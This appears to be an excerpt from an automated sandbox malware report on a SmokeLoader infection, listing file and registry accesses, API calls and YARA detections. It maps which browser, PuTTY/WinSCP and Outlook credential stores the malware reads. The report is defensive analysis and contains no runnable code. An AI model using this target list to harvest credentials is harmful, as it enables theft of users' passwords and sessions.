Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djvbaae	Queries volume information: C:\Users\user\AppData\Roaming\djvbaae VolumeInformation
Source: C:\Users\user\AppData\Roaming\djvbaae	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02D62112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,

17_2_02D62112

Source: C:\Windows\explorer.exe

Code function: 14_2_03443490 GetUserNameW,

14_2_03443490

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02D62198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

17_2_02D62198

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5432, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829702.cde8135c-88c3-4c34-8670-7ef017742548.new-profile.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\background-update
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834620.c7889da7-33f0-4599-8452-58d47c58437b.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829744.7278f154-e8f4-4235-84c5-c5c1c6af0084.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1435a377-bbaf-4c9c-8706-0811a779fa3f
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\808127e8-e7ed-4078-b3f3-7f09061a011f
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.81ddb4cc-1d49-45f2-961f-e24ea6db2be5.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\12f997af-c065-4562-b9f6-11000bb95c9b
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834580.6fc53411-ad83-4cf6-a5f6-905f0f3f52e8.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1d5599c8-3f43-42cc-8163-9a43c60a06d1
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\78267ebf-1fb3-4b11-82e9-903e54a2a54e
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829746.67aa4432-87f8-463e-b422-f6679add9971.first-shutdown.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\7278f154-e8f4-4235-84c5-c5c1c6af0084
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\45e26519-596d-41a5-b290-e547b44111fd
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a5d6ec76-765c-4778-afd2-1e05a1554d8e
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\7d12ac42-15c3-4db9-abfe-259bc8d249ac
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\15f01145-7764-450b-9ad5-323693350a9c
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857833.45e26519-596d-41a5-b290-e547b44111fd.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.a73949a2-5a70-4025-8008-88156c16bb4a.event.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a7174184-f177-48c4-876a-8a51c2ed8fbc
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829737.9f7a5e7a-2be0-4ff7-b132-b1f6e59a8e58.event.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834608.65054280-9d54-477d-a3ea-afcb1f88e001.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\events
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\05d02ac8-b2f1-4670-8541-db8ec2bbf427
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857869.95af30ae-acac-4802-b983-233d7fd3cf34.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\3a40aaf9-3f8b-43a2-85e8-88e3ffc7666f
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\277ffbb3-8e94-4f3f-acac-7a401d130160
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834606.011115ff-9301-40fc-805e-ba07b7fdfce4.event.jsonlz4

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5432, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
